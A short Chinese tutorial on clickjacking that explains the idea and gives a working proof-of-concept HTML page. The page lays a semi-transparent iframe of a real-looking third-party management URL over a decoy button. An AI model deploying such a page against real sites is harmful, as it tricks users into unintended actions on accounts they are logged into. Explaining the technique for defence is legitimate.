什么是点击劫持：

是一种视觉上的欺骗，攻击者使用一个透明的，不可见的iframe标签，覆盖在一个网页上，诱使用户在该网页上进行操作，用户在不知情的情况下点击透明的iframe页面通过调整iframe页面的位置可以诱使用户恰好点击在iframe页面的的一些功能性按钮上

<!DOCTYPE html> <html lang="en"> <head>     <meta charset="UTF-8">     <meta name="viewport" content="width=device-width, initial-scale=1.0">     <meta http-equiv="X-UA-Compatible" content="ie=edge">     <title>click jack</title>     <style>     iframe{         width:900px;         height: 250px;         top: -195px;         left:-740px;         z-index: 2;         -moz-opacity:0.5;         opacity: 0.5;         filter:alpha(opacity=0.5);     }     button {         position: absolute;         top: 10px;         left: 10px;         width: 120px;         z-index:1;     }     </style> </head> <body>     <iframe src="http://search.esgcc.com.cn/managerGf/toGfIndexPage" scrolling="no"></iframe>     <button>CLICK jack</button> </body> </html> 通过控制iframe的长宽，调整top，left的位置，可以把iframe页面内任意部分覆盖到任何地方。 同时设置iframe的position位absolute并将z-index的设置为最大已达到让iframe在页面最上层。 最后，通过设置opacity来控制iframe页面的透明度，值为0是完全不可见